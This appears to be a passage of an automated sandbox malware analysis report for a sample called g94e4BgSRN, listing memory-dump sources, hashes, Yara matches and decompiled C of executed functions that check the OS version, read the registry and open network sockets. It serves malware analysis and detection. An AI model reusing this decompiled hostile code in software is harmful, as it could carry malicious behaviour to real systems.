                                                          • Instruction ID: d57a7a595498f3cce48ead14ab953016b5dd8e7a452b2811cafeedc849f5f13c
                                                          • Opcode Fuzzy Hash: 99a32a7d7d1cfcf1930da1b599531ed67ae132be6af7876455120805dc7659c7
                                                          • Instruction Fuzzy Hash: 4711E676404284CFCF12CF50D5C4B26BF72FB84324F24C6A9E9450B656C336D85ACBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286137706.0000000000B0D000.00000040.00000001.sdmp, Offset: 00B0D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b0d000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: caa1c39115dec62f506acc3054851e9a84238c15f76b8172daeef6ab33a055d9
                                                          • Instruction ID: 14d26235e85ff264b3e7156aa1a94d9c06d35c01f5ebd2ab84852450746922c9
                                                          • Opcode Fuzzy Hash: caa1c39115dec62f506acc3054851e9a84238c15f76b8172daeef6ab33a055d9
                                                          • Instruction Fuzzy Hash: B2119D75504280DFDB11CF54D5D4B15FFA1FB84324F28CAADD8494B696C33AD84ACB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286122871.0000000000AFD000.00000040.00000001.sdmp, Offset: 00AFD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_afd000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3c5f8491a33f15af46f203e9233bf1d026781dca5f68ba38d62ab20b87ca22c2
                                                          • Instruction ID: 6fd1d1d48800182db29971c42b4385958489fb6181a9557d504c1aaeb119aa52
                                                          • Opcode Fuzzy Hash: 3c5f8491a33f15af46f203e9233bf1d026781dca5f68ba38d62ab20b87ca22c2
                                                          • Instruction Fuzzy Hash: 4A01F7714043489AEB12AFA5CDC4BB6BBECDF41368F18C95AFE041E246D7799844C6B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286122871.0000000000AFD000.00000040.00000001.sdmp, Offset: 00AFD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_afd000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 193947904b25f9154977b8572522923aa4537dcf9fcdf7a63795221d52db7ccc
                                                          • Instruction ID: 24a8654022e6a3803398916849ef7ff6643afe27cba0119b3eec6a36715e1586
                                                          • Opcode Fuzzy Hash: 193947904b25f9154977b8572522923aa4537dcf9fcdf7a63795221d52db7ccc
                                                          • Instruction Fuzzy Hash: 53F062714043489EEB119F59CCC4B62FB9CEB81734F18C45AEE085F296C3799C44CAB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286193243.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 15e364c17ab4421243eae39e3878d002fef44469c0a7b0772ce2090fca322aa1
                                                          • Instruction ID: 672456e7520feead8b67b344246491d8c08f9f735c88895d2f45491c4db350bb
                                                          • Opcode Fuzzy Hash: 15e364c17ab4421243eae39e3878d002fef44469c0a7b0772ce2090fca322aa1
                                                          • Instruction Fuzzy Hash: A412A2B14A2746EAD330CF65E9885893BA1F7C5328BD0420BD2615BAF0D7BC194BCF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286193243.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d37420e7e1c7d1742b65c441b3ceb060ae02871b81e5e2043abcb97a1fab0173
                                                          • Instruction ID: a4245e26f1980044589f1edcb28e5780ca8153838234a9888e663db8d8221284
                                                          • Opcode Fuzzy Hash: d37420e7e1c7d1742b65c441b3ceb060ae02871b81e5e2043abcb97a1fab0173
                                                          • Instruction Fuzzy Hash: 15A16D36E002198FCF05DFA5C9445AEBBF6FF85300B1585AAE815BB261EB75E905CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.286193243.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_g94e4BgSRN.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d660a977e76249f5eb035d154842158d413e7e8ed86af448bf45d8adb4307444
                                                          • Instruction ID: cb6c19bf87924a0bf7cd5183951f96f09721e746d18d5e4ac383511639d181ac
                                                          • Opcode Fuzzy Hash: d660a977e76249f5eb035d154842158d413e7e8ed86af448bf45d8adb4307444
                                                          • Instruction Fuzzy Hash: 4BC139B1862746ABD320CF65E9885897BB1FBC5328F90420BD2616B6F0D7BC1847CF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          C-Code - Quality: 45%
                                                          			E004132E6(void* __ecx, void* __edx) {
                                                          				char _v26;
                                                          				short _v28;
                                                          				intOrPtr _v164;
                                                          				char _v168;
                                                          				intOrPtr _v172;
                                                          				intOrPtr _v176;
                                                          				intOrPtr _v208;
                                                          				char _v212;
                                                          				short _v216;
                                                          				char _v220;
                                                          				char _v224;
                                                          				intOrPtr _v228;
                                                          				char _v232;
                                                          				char _v240;
                                                          				char _v244;
                                                          				void* _t46;
                                                          				void* _t48;
                                                          				intOrPtr* _t51;
                                                          				intOrPtr _t57;
                                                          				void* _t72;
                                                          				char _t75;
                                                          				char* _t77;
                                                          				void* _t78;
                                                          				void* _t79;
                                                          				intOrPtr _t81;
                                                          				void* _t83;
                                                          				char* _t84;
                                                          				intOrPtr* _t85;
                                                          
                                                          				_t79 = __edx;
                                                          				_t78 = __ecx;
                                                          				_t85 =  &_v228;
                                                          				_t75 =  &_v168;
                                                          				_v228 = 0x9c;
                                                          				_v232 = 0;
                                                          				_v212 = 0;
                                                          				_v208 = 0;
                                                          				 *_t85 = _t75;
                                                          				_t46 = E004129E4();
                                                          				 *_t85 = _t75;
                                                          				_v168 = 0x9c;
                                                          				L0041F57C();
                                                          				_t83 = _t46;
                                                          				if(_t46 == 0) {
                                                          					_v240 = _t75;
                                                          					_v172 = 0x94;
                                                          					L0041F57C();
                                                          					_push(_t75);
                                                          					if(_t46 != 0) {
                                                          						L29:
                                                          						return 0;
                                                          					}
                                                          				}
                                                          				_t48 = E004081AA("Ed5LC542dMZ65dlXR8W");
                                                          				_t51 = E00407F8E(_t79, E00407F7A(_t79, E004081AA("wd0RdiNh.Sii")), _t48);
                                                          				if(_t51 == 0) {
                                                          					_v244 =  &_v212; // executed
                                                          					L0041F594(); // executed
                                                          				} else {
                                                          					_v244 =  &_v212;
                                                          					 *_t51();
                                                          				}
                                                          				_push(_t78);
                                                          				if(_t83 == 0 || _v164 != 2) {
                                                          					goto L29;
                                                          				}
                                                          				if(_v176 != 5) {
                                                          					L15:
                                                          					_t84 =  &_v220;
                                                          					_t77 =  &_v224;
                                                          					_v244 = _t84;
                                                          					 *_t85 = _t77;
                                                          					if(E0041328F() == 0 || _v224 != 6) {
                                                          						L25:
                                                          						_v244 = _t84;
                                                          						 *_t85 = _t77;
                                                          						if(E0041328F() == 0 || _v224 != 0xa || _v220 != 0) {
                                                          							goto L29;
                                                          						} else {
                                                          							return (0 | _v26 != 0x00000001) + (0 | _v26 != 0x00000001) + 0xd;
                                                          						}
                                                          					} else {
                                                          						_t57 = _v220;
                                                          						if(_t57 != 0) {
                                                          							if(_t57 != 1) {
                                                          								if(_t57 != 2) {
                                                          									if(_t57 != 3) {
                                                          										goto L25;
                                                          									}
                                                          									return (0 | _v26 != 0x00000001) + 0xb + (0 | _v26 != 0x00000001) * 2;
                                                          								}
                                                          								return (0 | _v26 != 0x00000001) + (0 | _v26 != 0x00000001) + 0xa;
                                                          							}
                                                          							return (0 | _v26 != 0x00000001) + 8;
                                                          						}
                                                          						return ((0 | _v26 == 0x00000001) - 0x00000001 & 0xfffffa07) + 0x600;
                                                          					}
                                                          				}
                                                          				_t81 = _v172;
                                                          				_t72 = 0x501;
                                                          				if(_t81 != 1) {
                                                          					if(_t81 != 2) {
                                                          						goto L15;
                                                          					}
                                                          					_t72 = 3;
                                                          					if(_v28 != 0x8000) {
                                                          						if(_v26 != 1) {
                                                          							L14:
                                                          							 *_t85 = 0x59;
                                                          							L0041F87C();
                                                          							_push(_t81);
                                                          							asm("sbb eax, eax");
                                                          							return _t72 + 5;
                                                          						}
                                                          						_t72 = 2;
                                                          						if(_v216 != 9) {
                                                          							goto L14;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t72;
                                                           			}

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Ed5LC542dMZ65dlXR8W$wd0RdiNh.Sii
                                                          • API String ID: 0-2370874720
                                                          • Opcode ID: 46006a64fbda4bf4b3e9b0ffcf7154b995a5e1936410bb6f002cd3adb6ade318
                                                          • Instruction ID: aea862b3450ebf307a16053a8a3fc20b1df094ade6bc7c343729d6a33193dea1
                                                          • Opcode Fuzzy Hash: 46006a64fbda4bf4b3e9b0ffcf7154b995a5e1936410bb6f002cd3adb6ade318
                                                          • Instruction Fuzzy Hash: D7418E7040C7419AEB21AF21C5457AFBAE0AF81759F148E2FE4C487281D37D8AC98B5B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$Unknown
                                                          • API String ID: 0-3125819936
                                                          • Opcode ID: 09c9c0a9f06fa941f3f5a46c28196dba5f2fafc07f774812d3ae38cfce7fc380
                                                          • Instruction ID: 75a62b7ad59212d7e7d3757252a2119b8f15ada3fb68da9ed8f134ad780259a0
                                                          • Opcode Fuzzy Hash: 09c9c0a9f06fa941f3f5a46c28196dba5f2fafc07f774812d3ae38cfce7fc380
                                                          • Instruction Fuzzy Hash: 830108B0409341AED320AF26D94479BFBE4BBD4714F008A1EE49847290D37985498B97
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cef1c203a13e6339b71b227b83384d952d40f96f061476ba986419ca8909447b
                                                          • Instruction ID: 50f9dbed06e6853259d32925d3d8c4084038ba02febeb7ff5867e9cbce9530da
                                                          • Opcode Fuzzy Hash: cef1c203a13e6339b71b227b83384d952d40f96f061476ba986419ca8909447b
                                                          • Instruction Fuzzy Hash: 1DF0F9B49087458BD300FF3DC44521ABAE1BF88328F558A3EE499E3395E63CC5558E07
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: -
                                                          • API String ID: 0-2547889144
                                                          • Opcode ID: 772a2119c266b746b4a9d798261a1b96d186bc9b60f73d726c78d5d6e4f8f310
                                                          • Instruction ID: 542a74277ee6daf56934a715b94c3cb6415021c893f49c4910618d7e1c795e3b
                                                          • Opcode Fuzzy Hash: 772a2119c266b746b4a9d798261a1b96d186bc9b60f73d726c78d5d6e4f8f310
                                                          • Instruction Fuzzy Hash: 8B416E70608B008FC720EF69D48461BBBE4EF85324F518A3FE994A73D1C77899458F9A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 91%
                                                          			E00410608(signed int __ecx, char _a4, intOrPtr _a8) {
                                                          				char _v16;
                                                          				intOrPtr _v20;
                                                          				intOrPtr _v24;
                                                          				intOrPtr _v44;
                                                          				char* _v48;
                                                          				intOrPtr _v52;
                                                          				intOrPtr _v56;
                                                          				intOrPtr _v60;
                                                          				intOrPtr _v64;
                                                          				intOrPtr _v68;
                                                          				intOrPtr _v72;
                                                          				char _v76;
                                                          				intOrPtr _v92;
                                                          				intOrPtr _v96;
                                                          				intOrPtr _v100;
                                                          				intOrPtr _v104;
                                                          				intOrPtr _v108;
                                                          				char _t27;
                                                          				intOrPtr _t33;
                                                          				intOrPtr _t34;
                                                          				void* _t41;
                                                          				intOrPtr* _t43;
                                                          
                                                          				_t35 = 0;
                                                          				_v44 = 0;
                                                          				_v52 = 0;
                                                          				_v56 = 0xf003f;
                                                          				_v60 = 0;
                                                          				_v48 =  &_v16;
                                                          				_v64 = 0;
                                                          				_v68 = 0;
                                                          				_v72 = _a8;
                                                          				_t27 = _a4;
                                                          				_v76 = _t27; // executed
                                                          				L0041F454(); // executed
                                                          				_t43 = _t41 - 0x20;
                                                          				if(_t27 == 0) {
                                                          					asm("repne scasb");
                                                          					_v104 = 0;
                                                          					_v96 = _v16;
                                                          					_v92 =  !(__ecx | 0xffffffff) - 1;
                                                          					_v100 = _v20;
                                                          					_v108 = _v24;
                                                          					_t33 = _v52;
                                                          					 *_t43 = _t33; // executed
                                                          					L0041F41C(); // executed
                                                          					_t43 = _t43 - 0x18;
                                                          					_t34 = _v76;
                                                          					_t35 = 0 | _t33 == 0x00000000;
                                                          					 *_t43 = _t34; // executed
                                                          					L0041F45C(); // executed
                                                          					_push(_t34);
                                                          				}
                                                          				return _t35;
                                                          			}

                                                          Instruction addresses for E00410608 (column detached from the listing above): 0x0041060a 0x00410613 0x0041061b 0x00410623 0x0041062b 0x00410633 0x0041063b 0x00410643 0x0041064b 0x0041064f 0x00410653 0x00410656 0x0041065b 0x00410660 0x0041066b 0x00410671 0x0041067c 0x00410684 0x00410688 0x00410690 0x00410694 0x00410698 0x0041069b 0x004106a0 0x004106a5 0x004106a9 0x004106ac 0x004106af 0x004106b4 0x004106b4 0x004106bc

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ?
                                                          • API String ID: 0-1684325040
                                                          • Opcode ID: 1e6f53b0590ab74d9dcc6709235106d0a0d986833162969ce48852ece4fb2487
                                                          • Instruction ID: d7b5c200bfe116dfd6f132702afe2373019979046eeb2612c7d3539b4a1fd506
                                                          • Opcode Fuzzy Hash: 1e6f53b0590ab74d9dcc6709235106d0a0d986833162969ce48852ece4fb2487
                                                          • Instruction Fuzzy Hash: 6111B0B45083419FD340EF69D59475BFBE0BB88354F40892EF89883351E7B9D5898F86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 92%
                                                          			E0041328F() {
                                                          				intOrPtr* _v4;
                                                          				intOrPtr* _v8;
                                                          				char _v16;
                                                          				intOrPtr _v28;
                                                          				intOrPtr _v36;
                                                          				intOrPtr _v40;
                                                          				char* _t10;
                                                          				intOrPtr _t12;
                                                          				void* _t15;
                                                          				intOrPtr* _t18;
                                                          				intOrPtr* _t19;
                                                          
                                                          				_t10 =  &_v16;
                                                          				_v40 = 0x66;
                                                          				 *_t18 = 0;
                                                          				_v16 = 0;
                                                          				_v36 = _t10;
                                                          				L0041F69C(); // executed
                                                          				_t15 = 0;
                                                          				_t19 = _t18 - 0xc;
                                                          				if(_t10 == 0) {
                                                          					_t12 = _v28;
                                                          					 *_v4 =  *((intOrPtr*)(_t12 + 0x10));
                                                          					 *_v8 =  *((intOrPtr*)(_t12 + 0xc));
                                                          					 *_t19 = _t12;
                                                          					L0041F6A4();
                                                          					_push(_t12);
                                                          					_t15 = 1;
                                                          				}
                                                          				return _t15;
                                                          			}

                                                          Instruction addresses for E0041328F (column detached from the listing above): 0x00413292 0x00413296 0x0041329e 0x004132a5 0x004132ad 0x004132b1 0x004132b6 0x004132b8 0x004132bd 0x004132bf 0x004132ca 0x004132d3 0x004132d5 0x004132d8 0x004132dd 0x004132de 0x004132de 0x004132e5

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: f
                                                          • API String ID: 0-1993550816
                                                          • Opcode ID: adce9d268615c65e9b031c2403f5ee47e1848614fcce32b1b10be943295c3ccf
                                                          • Instruction ID: bf6d1e5e530aa92c88c9cb547170410969f3c4ca1d96cbd027a6ecb1b54c6bd2
                                                          • Opcode Fuzzy Hash: adce9d268615c65e9b031c2403f5ee47e1848614fcce32b1b10be943295c3ccf
                                                          • Instruction Fuzzy Hash: 19F0F8B45083018FC704EF25C185B5BBBE1BF88304F40886DE88487354D379D58ACB96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 20%
                                                          			E004059D3(signed int __ecx, signed int _a4, signed int _a8) {
                                                          				char _v44;
                                                          				char _v48;
                                                          				signed int _v60;
                                                          				intOrPtr _v68;
                                                          				signed int _v72;
                                                          				intOrPtr _v80;
                                                          				intOrPtr _v84;
                                                          				signed int _v88;
                                                          				signed int _v92;
                                                          				intOrPtr _v96;
                                                          				void* __ebp;
                                                          				signed int _t57;
                                                          				intOrPtr _t61;
                                                          				signed int _t63;
                                                          				intOrPtr _t71;
                                                          				signed int _t73;
                                                          				intOrPtr _t77;
                                                          				intOrPtr _t83;
                                                          				signed int _t87;
                                                          				signed int _t89;
                                                          				intOrPtr _t90;
                                                          				char* _t93;
                                                          				char* _t94;
                                                          				char* _t95;
                                                          				signed int _t97;
                                                          				signed int _t98;
                                                          				signed int _t99;
                                                          				signed int* _t100;
                                                          				void* _t101;
                                                          				intOrPtr* _t102;
                                                          
                                                          				_t88 = __ecx;
                                                          				_t100 =  &_v60;
                                                          				_t87 = _a4;
                                                          				_t97 = _a8;
                                                          				_v48 = 0xffffffff;
                                                          				if(E00408E53() != 4) {
                                                          					if(E00408E53() != 2) {
                                                          						_t93 =  &_v44;
                                                          						_v72 = _t97;
                                                          						 *_t100 = _t87;
                                                          						_v68 = _t93;
                                                          						_t57 = E004051B5(__ecx, _t90);
                                                          						if(_t57 != 0) {
                                                          							_v68 = 6;
                                                          							_v72 = 1;
                                                          							 *_t100 = 2; // executed
                                                          							L0041F8E4(); // executed
                                                          							_t101 = _t100 - 0xc;
                                                          							_v60 = _t57;
                                                          							if(_t57 == 0xffffffff) {
                                                          								goto L28;
                                                          							}
                                                          							_v80 = 0x10;
                                                          							_v84 = _t93;
                                                          							_v88 = _t57; // executed
                                                          							L0041F93C(); // executed
                                                          							_t102 = _t101 - 0xc;
                                                          							if(_t57 != 0) {
                                                          								L12:
                                                          								 *_t102 =  &_v72;
                                                          								_t57 = E00405999(_t90);
                                                          								goto L28;
                                                          							}
                                                          							L31:
                                                          							return _v72;
                                                          						}
                                                          						L28:
                                                          						return _t57 | 0xffffffff;
                                                          					}
                                                          					if( *0x42b300 == 0) {
                                                          						 *0x42b300 =  *0x42b304;
                                                          					}
                                                          					_t94 =  &_v44;
                                                          					_t98 =  &_v48;
                                                          					while(1) {
                                                          						_t61 =  *0x42b300;
                                                          						if(_t61 == 0) {
                                                          							goto L31;
                                                          						}
                                                          						_v68 = _t94;
                                                          						_t91 =  *((intOrPtr*)(_t61 + 0x44));
                                                          						 *_t100 = _t61 + 4;
                                                          						_v72 =  *((intOrPtr*)(_t61 + 0x44));
                                                          						_t63 = E004051B5(_t88,  *((intOrPtr*)(_t61 + 0x44)));
                                                          						if(_t63 == 0) {
                                                          							L26:
                                                          							 *0x42b300 =  *((intOrPtr*)( *0x42b300 + 0x88));
                                                          							continue;
                                                          						}
                                                          						_v68 = 0;
                                                          						_v72 = 1;
                                                          						 *_t100 = 2;
                                                          						L0041F8E4();
                                                          						_v80 = 0x10;
                                                          						_v84 = _t94;
                                                          						_v88 = _t63;
                                                          						_v60 = _t63;
                                                          						L0041F93C();
                                                          						_t100 = _t100;
                                                          						if(_t63 == 0) {
                                                          							_v88 = _t97;
                                                          							_v92 = _t87;
                                                          							_v96 =  *0x42b300;
                                                          							 *_t100 = _v72;
                                                          							if(E004058E9(_t98) == 0) {
                                                          								goto L23;
                                                          							}
                                                          							goto L31;
                                                          						}
                                                          						L23:
                                                          						 *_t100 = _t98;
                                                          						E00405999(_t91);
                                                          						goto L26;
                                                          					}
                                                          					goto L31;
                                                          				}
                                                          				if( *0x42b300 == 0) {
                                                          					 *0x42b300 =  *0x42b304;
                                                          				}
                                                          				_t95 =  &_v44;
                                                          				_t99 =  &_v48;
                                                          				while(1) {
                                                          					_t71 =  *0x42b300;
                                                          					if(_t71 == 0) {
                                                          						goto L31;
                                                          					}
                                                          					_v68 = _t95;
                                                          					_t92 =  *((intOrPtr*)(_t71 + 0x44));
                                                          					 *_t100 = _t71 + 4;
                                                          					_v72 =  *((intOrPtr*)(_t71 + 0x44));
                                                          					_t73 = E004051B5(_t88,  *((intOrPtr*)(_t71 + 0x44)));
                                                          					if(_t73 == 0) {
                                                          						L15:
                                                          						 *0x42b300 =  *((intOrPtr*)( *0x42b300 + 0x88));
                                                          						continue;
                                                          					}
                                                          					_v68 = 0;
                                                          					_v72 = 1;
                                                          					 *_t100 = 2;
                                                          					L0041F8E4();
                                                          					_v80 = 0x10;
                                                          					_v84 = _t95;
                                                          					_v88 = _t73;
                                                          					_v60 = _t73;
                                                          					L0041F93C();
                                                          					_t100 = _t100;
                                                          					if(_t73 != 0) {
                                                          						L14:
                                                          						 *_t100 = _t99;
                                                          						E00405999(_t92);
                                                          						goto L15;
                                                          					}
                                                          					_t92 =  *0x42b300;
                                                          					_t77 =  *((intOrPtr*)(_t92 + 0x88));
                                                          					_t88 =  *((intOrPtr*)(_t77 + 0x44));
                                                          					_v96 = _t92;
                                                          					_v92 = _t77 + 4;
                                                          					_v88 =  *((intOrPtr*)(_t77 + 0x44));
                                                          					 *_t100 = _v72;
                                                          					if(E004058E9(_t99) == 0) {
                                                          						goto L14;
                                                          					} else {
                                                          						goto L8;
                                                          					}
                                                          					while(1) {
                                                          						L8:
                                                          						 *0x42b300 =  *((intOrPtr*)( *0x42b300 + 0x88));
                                                          						_t90 =  *0x42b300;
                                                          						if(_t90 == 0) {
                                                          							goto L31;
                                                          						}
                                                          						_t83 =  *((intOrPtr*)(_t90 + 0x88));
                                                          						_t89 = _v72;
                                                          						if(_t83 == 0) {
                                                          							_v88 = _t97;
                                                          							_v92 = _t87;
                                                          						} else {
                                                          							_v92 = _t83 + 4;
                                                          							_v88 =  *(_t83 + 0x44);
                                                          						}
                                                          						_v96 = _t90;
                                                          						 *_t100 = _t89;
                                                          						if(E004058E9(_t99) != 0) {
                                                          							continue;
                                                          						} else {
                                                          							goto L12;
                                                          						}
                                                          					}
                                                          					goto L31;
                                                          				}
                                                          				goto L31;
                                                          			}


































                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 257ab1642c2ba7176df9333284737b40def127f22e375dc60ae8d0ec264ec92a
                                                          • Instruction ID: dc7f80c90ba20af356347f24dd4de35e54817c060e921352895bdcebc13e1e4f
                                                          • Opcode Fuzzy Hash: 257ab1642c2ba7176df9333284737b40def127f22e375dc60ae8d0ec264ec92a
                                                          • Instruction Fuzzy Hash: 7D71B7B0508B059FD710EF29D58465BBBE0FF84354F54893EE88897392D778A4468F4A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 98%
                                                          			E004106BD(void* __eax, char _a4, intOrPtr _a8, intOrPtr _a12) {
                                                          				intOrPtr _v24;
                                                          				char _v40;
                                                          				intOrPtr _v44;
                                                          				intOrPtr _v48;
                                                          				char _v56;
                                                          				char _v60;
                                                          				intOrPtr _v64;
                                                          				signed int _v68;
                                                          				intOrPtr _v72;
                                                          				char _v76;
                                                          				signed int _v80;
                                                          				intOrPtr _v84;
                                                          				signed int _v88;
                                                          				intOrPtr _v92;
                                                          				char _v96;
                                                          				signed int _v100;
                                                          				signed int _v104;
                                                          				signed int _v108;
                                                          				intOrPtr _v112;
                                                          				intOrPtr _v120;
                                                          				intOrPtr _v124;
                                                          				char* _v128;
                                                          				intOrPtr _v132;
                                                          				intOrPtr _v136;
                                                          				signed int _t44;
                                                          				signed int _t45;
                                                          				signed int _t49;
                                                          				char _t51;
                                                          				intOrPtr _t53;
                                                          				char _t54;
                                                          				signed int _t55;
                                                          				signed int _t56;
                                                          				intOrPtr _t57;
                                                          				char* _t58;
                                                          				void* _t59;
                                                          				void* _t61;
                                                          				signed int* _t62;
                                                          
                                                          				_t54 = _a4;
                                                          				_t57 = _a8;
                                                          				_t56 =  &_v40;
                                                          				_v64 = 0x201;
                                                          				_v68 = 0;
                                                          				_v60 = _t56;
                                                          				_t53 = _a12;
                                                          				_v72 = _t57;
                                                          				_v76 = _t54; // executed
                                                          				L0041F42C(); // executed
                                                          				_t61 = _t59 - 0x28;
                                                          				if(__eax != 0) {
                                                          					_v96 = _t54;
                                                          					_v80 = _t56;
                                                          					_t55 = 0;
                                                          					_v84 = 0x101;
                                                          					_v88 = 0;
                                                          					_v92 = _t57;
                                                          					L0041F42C(); // executed
                                                          					_t62 = _t61 - 0x14;
                                                          					if(__eax == 0) {
                                                          						_t44 = _v80;
                                                          						_t58 =  &_v76;
                                                          						_v100 = 0;
                                                          						_v104 = 0;
                                                          						_v108 = 0;
                                                          						_v96 = _t58;
                                                          						_v112 = _t53;
                                                          						 *_t62 = _t44;
                                                          						L0041F424();
                                                          						_t62 = _t62 - 0x18;
                                                          						if(_t44 == 0 && _v100 < _v44) {
                                                          							goto L7;
                                                          						}
                                                          						goto L8;
                                                          					}
                                                          				} else {
                                                          					_t51 = _v60;
                                                          					_t58 =  &_v56;
                                                          					_v80 = 0;
                                                          					_v84 = 0;
                                                          					_v88 = 0;
                                                          					_t55 = 0;
                                                          					_v76 = _t58;
                                                          					_v92 = _t53;
                                                          					_v96 = _t51;
                                                          					L0041F424();
                                                          					_t62 = _t61 - 0x18;
                                                          					if(_t51 == 0 && _v24 > _v80) {
                                                          						L7:
                                                          						_v120 = _t58;
                                                          						_v132 = 0;
                                                          						_v136 = _t53;
                                                          						_v124 = _v48;
                                                          						_v128 =  &_v96;
                                                          						_t49 = _v104;
                                                          						 *_t62 = _t49;
                                                          						L0041F424();
                                                          						_t62 = _t62 - 0x18;
                                                          						_t55 = _t49 & 0xffffff00 | _t49 == 0x00000000;
                                                          					}
                                                          					L8:
                                                          					_t45 = _v104;
                                                          					 *_t62 = _t45;
                                                          					L0041F45C();
                                                          					_push(_t45);
                                                          				}
                                                          				return _t55;
                                                          			}









































                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e61b238f31f9a1af3280de932191ddadf40332958d4424c58cf9f30b9089abbc
                                                          • Instruction ID: b9298c354bfd1ad9ab6003ea3d07812b51851590691558723ca7996c5ddaa5d6
                                                          • Opcode Fuzzy Hash: e61b238f31f9a1af3280de932191ddadf40332958d4424c58cf9f30b9089abbc
                                                          • Instruction Fuzzy Hash: 8331C3B55083059BD300AF6AC54435BFBE4BB84758F40892EF89897351D7B8EA898F86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
